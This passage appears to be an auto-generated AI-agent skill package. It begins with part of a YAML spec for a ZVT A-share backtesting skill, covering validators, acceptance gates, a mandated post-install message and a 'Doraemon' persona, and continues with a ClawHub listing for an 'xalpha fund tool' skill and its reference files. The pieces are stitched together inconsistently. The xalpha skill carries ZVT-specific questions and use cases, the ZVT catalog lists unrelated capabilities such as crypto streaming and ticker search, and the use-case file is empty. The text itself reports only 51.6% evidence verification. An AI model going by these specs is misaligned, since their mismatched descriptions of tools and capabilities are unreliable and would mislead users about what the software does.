      stock_splits → capital_gains → auto_adjust) — BD-054's multiday interval resampling fallback depends on this specific
      sequence
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Pipeline stage reordering breaks BD-054's resampling fallback for multiday intervals, causing incorrect historical
      price calculations that silently accumulate errors across historical data
    derived_from_bd_id: BD-046
  - id: finance-C-219
    when: When implementing or modifying the unit error detection mechanisms (BD-026, BD-027, BD-044)
    action: Verify that the 100x detection (BD-026), rounding to nearest 20 (BD-027), and 100x multiplier (BD-044) produce
      consistent results for each ratio values — ratios like 95 or 85 that round to 100 may not align with exact-match expectations
      in the multiplier
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: The three-mechanism 100x error detection system fails when rounding misaligns with multiplier expectations,
      allowing 95x ratios to pass undetected while 80x ratios trigger wrong conversions, creating amplified financial data
      corruption
    derived_from_bd_id: BD-048
  - id: finance-C-220
    when: When implementing or modifying price adjustment logic for split/dividend-adjusted prices
    action: Verify which adjustment mode (linear ratio from BD-046 auto_adjust vs backward adjustment from BD-047) is being
      applied and verify consistent usage — mixing modes produces mathematically different adjusted price series
    severity: high
    kind: operational_lesson
    modality: must
    consequence: Linear ratio and backward adjustment modes produce contradictory historical price series, causing users to
      receive inconsistent adjusted prices depending on which mode is applied, leading to wrong performance attribution and
      backtest results
    derived_from_bd_id: BD-050
  - id: finance-C-221
    when: When implementing or modifying dividend flagging thresholds (BD-030 >3.5%, BD-032 >8%, BD-043 >10% annualized yield)
    action: Verify that dividend thresholds do not create cascading conflicts for high-yield securities — REIT at 8% yield
      legitimately triggers both BD-032 phantom dividend flag and BD-043 implied yield flag, potentially excluding valid dividends
      from adjusted price calculations
    severity: high
    kind: operational_lesson
    modality: must
    consequence: Multiple overlapping dividend thresholds create a risk cascade where legitimate high-yield securities trigger
      multiple flags simultaneously, causing incorrect dividend exclusion and producing inaccurate adjusted price series
    derived_from_bd_id: BD-051
output_validator:
  assertions:
  - id: OV-01
    check_predicate: all(p in inspect.getsource(zvt.factors.algorithm.macd) for p in ['slow=26', 'fast=12', 'n=9'])
    failure_message: 'FATAL: MACD params drifted from (fast=12, slow=26, n=9) — SL-08 violation, non-reproducible signals'
    business_meaning: Standard MACD parameters are a semantic lock; drift makes results incomparable with industry-standard
      indicators and non-reproducible.
    source_ids:
    - SL-08
    - BD-036
  - id: OV-02
    check_predicate: result.get('total_trades', 0) > 0 or result.get('explicit_zero_trade_ack') is True
    failure_message: Zero trades executed — likely missing pre-fetched data (see PC-02) or over-restrictive filters
    business_meaning: A backtest with zero trades is not a valid result; either data is missing or the strategy never triggered.
      Structural non-emptiness check is insufficient — we need business confirmation.
    source_ids:
    - SL-01
    - finance-C-073
  - id: OV-03
    check_predicate: result.get('annual_return') is None or abs(float(result['annual_return'])) <= 5.0
    failure_message: 'FATAL: |annual_return| > 500% — likely look-ahead bias or data error'
    business_meaning: Annual returns exceeding 500% are physically implausible for A-share strategies; indicates look-ahead
      bias or corrupt data.
    source_ids: []
  - id: OV-04
    check_predicate: result.get('holding_change_pct') is None or abs(float(result['holding_change_pct'])) <= 1.0
    failure_message: 'FATAL: |holding_change_pct| > 100% — physically impossible'
    business_meaning: Holding change percentage cannot exceed 100%; violation indicates position accounting error.
    source_ids:
    - BD-029
  - id: OV-05
    check_predicate: result.get('max_drawdown') is None or abs(float(result['max_drawdown'])) <= 1.0
    failure_message: 'FATAL: |max_drawdown| > 100% — impossible for non-leveraged account'
    business_meaning: Maximum drawdown cannot exceed 100% without leverage; violation indicates calculation error or look-ahead
      bias.
    source_ids: []
  - id: OV-06
    check_predicate: not (hasattr(result, 'trade_log') and result.trade_log and any(result.trade_log[i].action == 'sell' and
      i+1 < len(result.trade_log) and result.trade_log[i+1].action == 'buy' and result.trade_log[i].timestamp == result.trade_log[i+1].timestamp
      for i in range(len(result.trade_log)-1)))
    failure_message: 'FATAL: buy-before-sell detected in same cycle — SL-01 violation, creates implicit leverage'
    business_meaning: SL-01 requires sell() before buy() in each cycle; violation means available_long was not updated before
      buying, risking duplicate positions.
    source_ids:
    - SL-01
  scaffold:
    validate_py_path: '{workspace}/validate.py'
    tail_block: "# === DO NOT MODIFY BELOW THIS LINE ===\nif __name__ == \"__main__\":\n    result = run_backtest()\n    from\
      \ validate import enforce_validation\n    enforce_validation(result, output_path=\"{workspace}/result.csv\")\n# ===\
      \ END DO NOT MODIFY ==="
  enforcement_protocol: 1. Never edit validate.py. 2. Never delete the DO NOT MODIFY tail block from the main script. 3. Never
    wrap enforce_validation() in try/except. 4. Never rewrite result write logic — it MUST go through enforce_validation.
    5. If validate.py raises ImportError, fix the dependency, do not remove the call.
acceptance:
  hard_gates:
  - id: G1
    check: '{workspace}/result.csv exists AND file size > 0'
    on_fail: Strategy did not produce output; check run_backtest() return value and enforce_validation() call
  - id: G2
    check: '{workspace}/result.csv.validation_passed marker file exists'
    on_fail: Validation did not complete; review validate.py output and fix assertion failures
  - id: G3
    check: 'Main script contains literal: from validate import enforce_validation'
    on_fail: Validation chain stripped; re-add the import in the DO NOT MODIFY block
  - id: G4
    check: 'Main script contains literal: # === DO NOT MODIFY BELOW THIS LINE ==='
    on_fail: Validation fence removed; regenerate DO NOT MODIFY tail block
  - id: G5
    check: 'result.csv has at least 1 row: pandas.read_csv(result.csv).shape[0] >= 1'
    on_fail: Empty result; check if trade_log is non-empty and factors generated signals. Confirm PC-02 (k-data exists) passed.
  - id: G6
    check: 'If MACD strategy: source contains ''slow=26'' AND ''fast=12'' AND ''n=9'' in algorithm call'
    on_fail: MACD params drifted from SL-08 lock; restore standard (12, 26, 9)
  - id: G7
    check: 'For data pipeline tasks: result.csv contains ''entity_id'' and ''timestamp'' fields'
    on_fail: Missing required columns; check Mixin.query_data return schema and DataFrame MultiIndex reset_index() before
      writing
  - id: G8
    check: 'OV-03 passes: abs(annual_return) <= 5.0 (500%)'
    on_fail: Physical plausibility check failed; investigate look-ahead bias or data corruption in input kdata
  soft_gates:
  - id: SG-01
    rubric: 'Strategy narrative consistency: user intent aligns with generated strategy.py logic. dim_a: signal direction
      (buy/sell) matches intent [1-5, pass>=4]; dim_b: frequency (daily/intraday) aligns [1-5, pass>=4]; dim_c: risk controls
      match user intent [1-5, pass>=4].'
  - id: SG-02
    rubric: 'Factor combination quality. dim_a: no highly correlated factor duplication [1-5, pass>=4]; dim_b: multi-period
      alignment correct [1-5, pass>=4]; dim_c: liquidity filter present for A-share [1-5, pass>=4].'
  - id: SG-03
    rubric: 'Data source selection appropriateness. dim_a: coverage sufficient for target entities [1-5, pass>=4]; dim_b:
      provider latency acceptable for strategy frequency [1-5, pass>=4]; dim_c: no unauthorized provider used without credentials
      [1-5, pass>=4].'
skill_crystallization:
  trigger: all_hard_gates_passed AND user_opt_out_skill_saving != true
  output_path_template: '{workspace}/../skills/{slug}.skill'
  slug_template: '{blueprint_id_short}-{uc_id_lower}'
  captured_fields:
  - name
  - intent_keywords
  - entry_point_script
  - validate_script
  - fatal_constraints
  - spec_locks
  - preconditions
  - install_recipes
  - human_summary_translated
  action: 'After all Hard Gates PASS, resolve slug via slug_template using the executed UC, then write the .skill YAML file
    at output_path_template. Notify user in their detected locale: ''Skill saved as {slug}.skill — next time say one of {sample_triggers}
    from the matched UC to invoke directly.'''
  violation_signal: All hard gates passed but no .skill file exists at expected path
  skill_file_schema:
    name: finance-bp-128 / Utility Function Validation
    version: v5.3
    intent_keywords:
    - timezone
    - datetime
    - validation
    - parse
    - utility
    entry_point: run_backtest
    fatal_guards:
    - SL-01
    - SL-02
    - SL-03
    - SL-04
    - SL-05
    - SL-06
    - SL-07
    - SL-08
    - SL-10
    - SL-11
    - SL-12
    spec_locks:
    - SL-01
    - SL-02
    - SL-03
    - SL-04
    - SL-05
    - SL-06
    - SL-07
    - SL-08
    - SL-09
    - SL-10
    - SL-11
    - SL-12
    preconditions:
    - PC-01
    - PC-02
    - PC-03
    - PC-04
post_install_notice:
  trigger: skill_installation_complete
  message_template:
    positioning: I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow.
    capability_catalog:
      group_strategy:
        source: auto_grouped
        strategy_reason: auto-grouped by UC.type (5 distinct values, balanced distribution)
      groups:
      - group_id: data_pipeline
        name: Data Pipeline
        description: ''
        emoji: 📊
        uc_count: 4
        ucs:
        - uc_id: UC-101
          name: Utility Function Validation
          short_description: Ensures date/timezone parsing and validation utilities work correctly for handling mixed timezone
            data from financial APIs
          sample_triggers:
          - timezone
          - datetime
          - validation
        - uc_id: UC-105
          name: Historical Price Data Retrieval
          short_description: Fetches historical price and volume data for securities across multiple intervals (daily, weekly,
            monthly) and time periods
          sample_triggers:
          - price history
          - historical data
          - OHLCV
        - uc_id: UC-107
          name: Price Data Repair and Resampling
          short_description: Corrects corrupted or misaligned price data and resamples data between different time intervals
            while maintaining data integrity
          sample_triggers:
          - repair
          - fix data
          - resample
        - uc_id: UC-110
          name: Concurrent Multi-Ticker Download
          short_description: Downloads price data for multiple tickers concurrently with thread safety, ensuring results don't
            get mixed between tickers
          sample_triggers:
          - concurrent
          - thread-safe
          - multi-ticker
      - group_id: screening
        name: Screening
        description: ''
        emoji: 📦
        uc_count: 1
        ucs:
        - uc_id: UC-102
          name: Stock Screener Query Execution
          short_description: Tests the ability to filter and screen stocks based on financial criteria like price thresholds
            and predefined strategies
          sample_triggers:
          - screen
          - filter
          - query
      - group_id: research_analysis
        name: Research Analysis
        description: ''
        emoji: 📦
        uc_count: 4
        ucs:
        - uc_id: UC-103
          name: Ticker Symbol Search
          short_description: Allows users to find ticker symbols by searching company names or partial queries, including
            fuzzy matching for misspellings
          sample_triggers:
          - search
          - find ticker
          - symbol lookup
        - uc_id: UC-104
          name: Financial Calendar Retrieval
          short_description: Retrieves upcoming earnings dates and IPO information calendars to help investors track corporate
            events
          sample_triggers:
          - earnings calendar
          - IPO
          - upcoming events
        - uc_id: UC-106
          name: Ticker Information and Metadata
          short_description: Retrieves comprehensive metadata for a ticker including holder information, splits, recommendations,
            and fundamental data
          sample_triggers:
          - ticker info
          - metadata
          - holders
        - uc_id: UC-111
          name: Securities Symbol Lookup by Type
          short_description: Looks up ticker symbols filtered by asset type (stocks, ETFs, mutual funds, indices) to find
            specific securities
          sample_triggers:
          - lookup
          - ETF
          - mutual fund
      - group_id: live_trading
        name: Live Trading
        description: ''
        emoji: 📦
        uc_count: 1
        ucs:
        - uc_id: UC-108
          name: Live Cryptocurrency Price Streaming
          short_description: Provides real-time cryptocurrency price streaming via WebSocket for trading applications and
            live market monitoring
          sample_triggers:
          - live
          - real-time
          - stream
      - group_id: monitoring
        name: Monitoring
        description: ''
        emoji: 📦
        uc_count: 2
        ucs:
        - uc_id: UC-109
          name: Cache Fallback on Read-Only Filesystem
          short_description: Handles cache storage gracefully when running in restricted environments without write permissions
            to the filesystem
          sample_triggers:
          - cache
          - permissions
          - fallback
        - uc_id: UC-112
          name: Timezone Cache Storage
          short_description: Caches timezone data for securities to reduce API calls and improve performance when fetching
            data for frequently-used tickers
          sample_triggers:
          - cache
          - timezone
          - storage
    call_to_action: Tell me which one you want to try.
    featured_entries:
    - uc_id: UC-101
      beginner_prompt: Try utility function validation
      auto_selected: true
    - uc_id: UC-102
      beginner_prompt: Try stock screener query execution
      auto_selected: true
    - uc_id: UC-103
      beginner_prompt: Try ticker symbol search
      auto_selected: true
    more_info_hint: Ask me 'what else can you do?' to see all 12 capabilities.
  locale_rendering:
    instruction: On skill_installation_complete, translate ALL user-facing strings (positioning + capability_catalog.groups[].name
      + capability_catalog.groups[].description + capability_catalog.groups[].ucs[].short_description + call_to_action + featured_entries[].beginner_prompt
      + more_info_hint) into detected user locale per locale_contract. Preserve UC-IDs, group_id, emoji, and sample_triggers
      verbatim.
    preserve_verbatim:
    - UC-IDs
    - group_id
    - emoji
    - sample_triggers
    - technical_class_names
  enforcement:
    action: 'Host agent MUST send composed message to user as the FIRST user-facing response after skill_installation_complete
      event. Message MUST contain: positioning, capability_catalog (rendered as markdown tables per group), 3 featured_entries,
      call_to_action, and more_info_hint.'
    violation_code: PIN-01
    violation_signal: First user-facing message post-install does not contain the full capability_catalog (all UCs grouped)
      OR skips featured_entries OR skips call_to_action.
human_summary:
  persona: Doraemon
  what_i_can_do:
    tagline: 'I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me
      what you want; I''ll write the code, you don''t have to dig docs. (Heads up: ZVT natively supports A-share, HK, and
      crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don''t bother for serious work.)'
    use_cases:
    - Ticker Symbol Search
    - Stock Screener Query Execution
    - Utility Function Validation
    - A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney
    - 'End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader'
    - Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout
    - Index composition data collection (SZ1000, SZ2000) with EM recorder
  what_i_auto_fetch:
  - ZVT stage pipeline structure (data_collection → visualization) from LATEST.yaml
  - Semantic locks (SL-01 through SL-12) — especially sell-before-buy ordering and MACD params
  - Fatal constraints (finance-C-*) relevant to your target strategy type
  - 'Default parameters: MACD(12,26,9), hfq adjustment, buy_cost=0.001, base_capital=1M CNY'
  - Entity ID format (stock_sh_600000) and DataFrame MultiIndex convention
  - Provider-specific recorder class names and required class attributes
  what_i_ask_you:
  - 'Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage
    is thin)'
  - 'Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare,
    or qmt (broker)?'
  - 'Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?'
  - 'Time range: start_timestamp and end_timestamp for backtest period'
  - 'Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?'
  locale_rendering:
    instruction: On first user contact, translate all fields above into detected user locale while preserving Doraemon persona
      (direct, frank, mildly snarky, knows limits).
    preserve_verbatim:
    - BD-IDs
    - SL-IDs
    - UC-IDs
    - finance-C-IDs
    - class_names
    - function_names
    - file_paths
    - numeric_thresholds

ClawHub Coding Data Analysis+2

T@clawhub-tangweigang-jpg-8679fec286

Xalpha Fund Tool

Skill

xalpha 支持多市场基金组合分析，实现 A/C 份额成本比较、可转债估值、组合业绩归因及基金相关性分析。

---
name: xalpha-fund-tool
description: |-
  xalpha 支持多市场基金组合分析，实现 A/C 份额成本比较、可转债估值、组合业绩归因及基金相关性分析。
license: Proprietary. See LICENSE.txt in project root.
compatibility: Designed for Doramagic-host ecosystem (Claude Code / openclaw / Cursor). Requires Python 3.12+ with uv package manager.
metadata:
  version: "v6.1"
  blueprint_id: "finance-bp-068"
  compiled_at: "2026-04-22T13:00:23.002206+00:00"
  capability_markets: "multi-market"
  capability_activities: "portfolio-analytics"
  sop_version: "crystal-compilation-v6.1"
---
# xalpha 基金工具 (xalpha-fund-tool)

> xalpha 支持多市场基金组合分析，实现 A/C 份额成本比较、可转债估值、组合业绩归因及基金相关性分析。

## Pipeline

`data_collection -> data_storage -> factor_computation -> target_selection -> trading_execution -> visualization`

## Top Use Cases (16 total)

### A/C Share Class Comparison for Fund Selection (`UC-101`)
Determine whether A-share or C-share fund classes are more cost-effective based on expected holding period, accounting for different fee structures in
**Triggers**: A份额, C份额, 基金比较

### Convertible Bond Valuation Analysis (`UC-103`)
Calculate intrinsic value, option value, and total value of convertible bonds using option pricing models, comparing xalpha estimates against third-pa
**Triggers**: 可转债, 期权定价, 内在价值

### 长赢指数投资 Correlation Analysis (`UC-104`)
Analyze correlation between different investment varieties in the '长赢指数投资' strategy and compare growth potential of narrow-based industry indices
**Triggers**: 长赢, 相关性, 行业指数

For all **16** use cases, see [references/USE_CASES.md](references/USE_CASES.md).

**Execute trigger**: `When user intent matches intent_router.uc_entries[].positive_terms AND user uses action verb (run/execute/跑/执行/backtest/fetch/collect)`

## What I'll Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

## Semantic Locks (Fatal)

| ID | Rule | On Violation |
|---|---|---|
| `SL-01` | Execute sell orders before buy orders in every trading cycle | halt |
| `SL-02` | Trading signals MUST use next-bar execution (no look-ahead) | halt |
| `SL-03` | Entity IDs MUST follow format entity_type_exchange_code | halt |
| `SL-04` | DataFrame index MUST be MultiIndex (entity_id, timestamp) | halt |
| `SL-05` | TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount | halt |
| `SL-06` | filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION | halt |
| `SL-07` | Transformer MUST run BEFORE Accumulator in factor pipeline | halt |
| `SL-08` | MACD parameters locked: fast=12, slow=26, signal=9 | halt |

Full lock definitions: [references/LOCKS.md](references/LOCKS.md)

## Top Anti-Patterns (14 total)

- **`AP-PORTFOLIO-ANALYTICS-001`**: Division by zero in price ratio calculations corrupts rebalancing
- **`AP-PORTFOLIO-ANALYTICS-002`**: Look-ahead bias from unshifted signal generation and position calculations
- **`AP-PORTFOLIO-ANALYTICS-003`**: Non-positive-semidefinite covariance matrix breaks CVXPY optimization

All 14 anti-patterns: [references/ANTI_PATTERNS.md](references/ANTI_PATTERNS.md)

## Evidence Quality Notice

> [QUALITY NOTICE] This crystal was compiled from blueprint finance-bp-068. Evidence verify ratio = 51.6% and audit fail total = 19. Generated results may have uncaptured requirement gaps. Verify critical decisions against source files (LATEST.yaml / LATEST.jsonl).

## Reference Files

| File | Contents | When to Load |
|---|---|---|
| [references/seed.yaml](references/seed.yaml) | V6+ 全量权威 (source-of-truth) | 有行为/决策争议时必读 |
| [references/ANTI_PATTERNS.md](references/ANTI_PATTERNS.md) | 14 条跨项目反模式 | 开始实现前 |
| [references/WISDOM.md](references/WISDOM.md) | 跨项目精华借鉴 | 架构决策时 |
| [references/CONSTRAINTS.md](references/CONSTRAINTS.md) | domain + fatal 约束 | 规则冲突时 |
| [references/USE_CASES.md](references/USE_CASES.md) | 全量 KUC-* 业务场景 | 需要完整示例时 |
| [references/LOCKS.md](references/LOCKS.md) | SL-* + preconditions + hints | 生成回测/交易代码前 |
| [references/COMPONENTS.md](references/COMPONENTS.md) | AST 组件地图（按 module 拆分）| 查 API 时 |

---

*Compiled by Doramagic crystal-compilation-v6.1 from `finance-bp-068` blueprint at 2026-04-22T13:00:23.002206+00:00.*
*See [human_summary.md](human_summary.md) for non-technical overview.*

FILE:human_summary.md
# Human Summary

> I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)

## What I Can Do

- **tagline**: I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)
- **use_cases**: ['Convertible Bond Valuation Analysis', "E's Portfolio ETF Investment Analysis", 'A/C Share Class Comparison for Fund Selection', 'A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney', 'End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader', 'Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout', 'Index composition data collection (SZ1000, SZ2000) with EM recorder']

## What I Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

FILE:references/ANTI_PATTERNS.md
# Anti-Patterns (Cross-Project)

Total: **14**

## finance-bp-066--wealthbot (2)

### `AP-PORTFOLIO-ANALYTICS-001` — Division by zero in price ratio calculations corrupts rebalancing <sub>(high)</sub>

When calculating price_diff using current_price divided by old_price without validating old_price is non-zero, the result is NaN or INF. This corrupts portfolio rebalancing calculations in wealthbot, causing incorrect buy/sell decisions based on invalid prices_diff values. The same issue appears in getPricesDiff() where divide-by-zero when old_price equals zero produces NaN/infinity that propagates to all subsequent trade decisions.

### `AP-PORTFOLIO-ANALYTICS-004` — Incorrect portfolio value tracking destroys time-series integrity <sub>(high)</sub>

Updating existing ClientPortfolioValue records instead of creating new ones destroys the time-series integrity needed for billing calculations and historical reconciliation. This creates data corruption where billing calculations and historical reporting against custodian records will fail to match. Portfolio value records must be linked to parent ClientPortfolio via proper relationships to avoid orphaned records.

## finance-bp-068--xalpha (1)

### `AP-PORTFOLIO-ANALYTICS-006` — FIFO sell order violation corrupts cost basis and XIRR <sub>(high)</sub>

Processing positions out of chronological order in FIFO sell operations causes incorrect cost basis assignment, leading to inaccurate realized gains/losses and wrong XIRR calculation. Chinese funds have tiered redemption fees based on holding periods, so FIFO violations result in incorrect holding period calculation and wrong redemption fee being applied, causing direct financial loss.

## finance-bp-068--xalpha, finance-bp-093--PyPortfolioOpt, finance-bp-117--Riskfolio-Lib (1)

### `AP-PORTFOLIO-ANALYTICS-010` — Missing DataFrame schema validation causes KeyError propagation <sub>(medium)</sub>

Passing non-DataFrame objects (numpy arrays, lists) where DataFrame is expected causes NameError, AttributeError, or TypeError in downstream pandas operations. xalpha's fundinfo.price requires specific columns (date, netvalue, totvalue, comment), PyPortfolioOpt and Riskfolio-Lib require index alignment between expected returns and covariance matrix. Missing columns cause backtest calculations to fail with NaN values or KeyError.

## finance-bp-082--stock-screener (1)

### `AP-PORTFOLIO-ANALYTICS-007` — Score validation bypass allows invalid composite calculations <sub>(medium)</sub>

Accepting scores outside the 0-100 range in screener results corrupts ranking and rating logic, causing unpredictable screening results that violate the fundamental score contract. When combined with division-by-zero guards that return 0.0 for empty screener lists, this creates unpredictable behavior where invalid scores produce wrong composite calculations and incorrect Strong Buy/Buy/Watch/Pass ratings.

## finance-bp-093--PyPortfolioOpt (1)

### `AP-PORTFOLIO-ANALYTICS-008` — Convex optimization constraints violate DCP rules <sub>(high)</sub>

Using non-convex objectives or DCP-violating expressions in CVXPY optimization causes DCPError, completely preventing portfolio optimization from running. Similarly, providing non-callable constraints or invalid bounds formats (not matching n_assets length) causes TypeError. Feasibility violations like setting target_volatility below global minimum or target_return above maximum achievable return make problems infeasible.

## finance-bp-093--PyPortfolioOpt, finance-bp-117--Riskfolio-Lib (1)

### `AP-PORTFOLIO-ANALYTICS-003` — Non-positive-semidefinite covariance matrix breaks CVXPY optimization <sub>(high)</sub>

Passing a non-positive-semidefinite covariance matrix to CVXPY optimization with assume_PSD=True produces incorrect results because the solver assumes validity without verification. This causes Cholesky decomposition to fail or produce garbage weights, preventing portfolio optimization from running entirely. Riskfolio-Lib and PyPortfolioOpt both require explicit PSD validation before optimization.

## finance-bp-106--pyfolio-reloaded (2)

### `AP-PORTFOLIO-ANALYTICS-005` — Allocation denominator excludes cash, corrupting portfolio composition <sub>(medium)</sub>

When computing allocation percentages excluding cash from the denominator, portfolio allocation percentages will not sum to 100%, misrepresenting the portfolio's actual composition. Additionally, concentration metrics become artificially skewed when including cash (a non-position asset), producing misleading diversification assessments that could lead to inappropriate risk management decisions.

### `AP-PORTFOLIO-ANALYTICS-009` — Transaction data corruption from missing columns and invalid dates <sub>(medium)</sub>

Extracting round trips from transactions DataFrame without validating required columns (amount, price, symbol) causes KeyError exceptions. When open_dt is not strictly less than close_dt, negative or zero duration values indicate data corruption causing incorrect holding period statistics. Similarly, non-normalized transaction timestamps cause intra-day trades to be incorrectly split across days.

## finance-bp-107--empyrical-reloaded (1)

### `AP-PORTFOLIO-ANALYTICS-011` — Wrong annualization factors distort cross-frequency metric comparison <sub>(high)</sub>

Applying incorrect annualization factors (wrong values for daily, weekly, monthly, quarterly, yearly frequencies) produces non-comparable metrics across different return frequencies, causing invalid strategy comparisons and misallocated capital. The Sharpe ratio formula must use correct annualization with sample standard deviation (ddof=1), otherwise producing misleading risk-adjusted return estimates.

## finance-bp-107--empyrical-reloaded, finance-bp-118--FinanceToolkit (1)

### `AP-PORTFOLIO-ANALYTICS-012` — Misaligned time series in alpha/beta calculation produces invalid factor analysis <sub>(high)</sub>

Passing returns and factor_returns to alpha_beta functions without verifying data alignment on index labels (pd.Series) or length equality (np.ndarray) produces incorrect alpha/beta values due to correlation computed between mismatched periods. Including benchmark ticker in the asset ticker list causes circular correlation producing meaningless beta values of approximately 1.0.

## finance-bp-108--finmarketpy (1)

### `AP-PORTFOLIO-ANALYTICS-013` — Forward-filling spot prices creates look-ahead bias in TRI construction <sub>(high)</sub>

Forward-filling spot prices creates look-ahead bias where future prices are used to calculate historical returns, invalidating all TRI-based backtest results. The total return index construction requires multiplicative cumulation using cumprod (not cumsum) with base value 100, as additive cumulation allows negative cumulative returns to break the index chain.

## finance-bp-108--finmarketpy, finance-bp-106--pyfolio-reloaded (1)

### `AP-PORTFOLIO-ANALYTICS-002` — Look-ahead bias from unshifted signal generation and position calculations <sub>(high)</sub>

Generating trading signals from current-period technical indicators (RSI, moving averages) without proper shift(-1) creates look-ahead bias, causing live trading returns to fall far below backtested results. Similarly, when estimating intraday positions from transactions without applying shift(1) to EOD positions, day-start positions are contaminated with end-of-day values, making results unrepresentative of actual trading.

## finance-bp-117--Riskfolio-Lib, finance-bp-093--PyPortfolioOpt (1)

### `AP-PORTFOLIO-ANALYTICS-014` — Unsupported solver selection breaks advanced risk calculations <sub>(medium)</sub>

Using solvers that don't support required cone programming (power cone, exponential cone) causes CVXPY to fail with SolverError, returning None and breaking risk calculations. CLARABEL, SCS, ECOS support power cone for RLVaR/RLDaR calculations, while CLARABEL/MOSEK/SCS/ECOS support exponential cone for EVaR calculations. Riskfolio-Lib and PyPortfolioOpt both require careful solver selection.

FILE:references/COMPONENTS.md
# Component Capability Map

**Project**: finance-bp-068--xalpha
**Scan date**: 2026-04-22
**Stats**: {'total_files': 8, 'total_classes': 45, 'total_functions': 0, 'total_stages': 8}

## Modules (8)

- [data_acquisition_&_caching](components/data_acquisition_-_caching.md): 5 classes
- [fund/index_information_&_pricing](components/fund-index_information_-_pricing.md): 7 classes
- [position_tracking_&_fifo](components/position_tracking_-_fifo.md): 4 classes
- [trade_accounting_&_cash_flow](components/trade_accounting_-_cash_flow.md): 4 classes
- [portfolio_aggregation_&_analysis](components/portfolio_aggregation_-_analysis.md): 4 classes
- [trading_policy_generation](components/trading_policy_generation.md): 8 classes
- [backtesting_engine](components/backtesting_engine.md): 8 classes
- [technical_indicators_&_evaluation](components/technical_indicators_-_evaluation.md): 5 classes

FILE:references/CONSTRAINTS.md
# Constraints

## preservation_manifest

```yaml
required_objects:
  business_decisions_count: 154
  fatal_constraints_count: 46
  non_fatal_constraints_count: 218
  use_cases_count: 16
  semantic_locks_count: 12
  preconditions_count: 4
  evidence_quality_rules_count: 2
  traceback_scenarios_count: 5

```

FILE:references/LOCKS.md
# Semantic Locks + Preconditions

## Semantic Locks (12)

### `SL-01` <sub>(on_violation: fatal)</sub>
Execute sell orders before buy orders in every trading cycle

### `SL-02` <sub>(on_violation: fatal)</sub>
Trading signals MUST use next-bar execution (no look-ahead)

### `SL-03` <sub>(on_violation: fatal)</sub>
Entity IDs MUST follow format entity_type_exchange_code

### `SL-04` <sub>(on_violation: fatal)</sub>
DataFrame index MUST be MultiIndex (entity_id, timestamp)

### `SL-05` <sub>(on_violation: fatal)</sub>
TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount

### `SL-06` <sub>(on_violation: fatal)</sub>
filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION

### `SL-07` <sub>(on_violation: fatal)</sub>
Transformer MUST run BEFORE Accumulator in factor pipeline

### `SL-08` <sub>(on_violation: fatal)</sub>
MACD parameters locked: fast=12, slow=26, signal=9

### `SL-09` <sub>(on_violation: warning)</sub>
Default transaction costs: buy_cost=0.001, sell_cost=0.001, slippage=0.001

### `SL-10` <sub>(on_violation: fatal)</sub>
A-share equity trading is T+1 (no same-day close of buy positions)

### `SL-11` <sub>(on_violation: fatal)</sub>
Recorder subclass MUST define provider AND data_schema class attributes

### `SL-12` <sub>(on_violation: fatal)</sub>
Factor result_df MUST contain either 'filter_result' OR 'score_result' column

## Preconditions (4)

- **`PC-01`**: `python3 -c 'import zvt; print(zvt.__version__)'` → on_fail: Run: python3 -m pip install zvt then re-run: python3 -m zvt.init_dirs to initialize data directories
- **`PC-02`**: `python3 -c "from zvt.api.kdata import get_kdata; df = get_kdata(entity_ids=['stock_sh_600000'], limit=1); assert df is not None and len(df) > 0, 'No kdata found'"` → on_fail: Run recorder first: python3 -m zvt.recorders.em.em_stock_kdata_recorder --entity_ids stock_sh_600000 (replace with your target entity IDs)
- **`PC-03`**: `python3 -c "import os; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home() / '.zvt')); assert zvt_home.exists(), f'ZVT home not found: {zvt_home}'"` → on_fail: Run: python3 -m zvt.init_dirs
- **`PC-04`**: `python3 -c "import os, tempfile; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home() / '.zvt')); test_f = zvt_home / '.write_test'; test_f.touch(); test_f.unlink()"` → on_fail: Check directory permissions: chmod u+w ~/.zvt or set ZVT_HOME environment variable to a writable location

FILE:references/USE_CASES.md
# Known Use Cases (KUC)

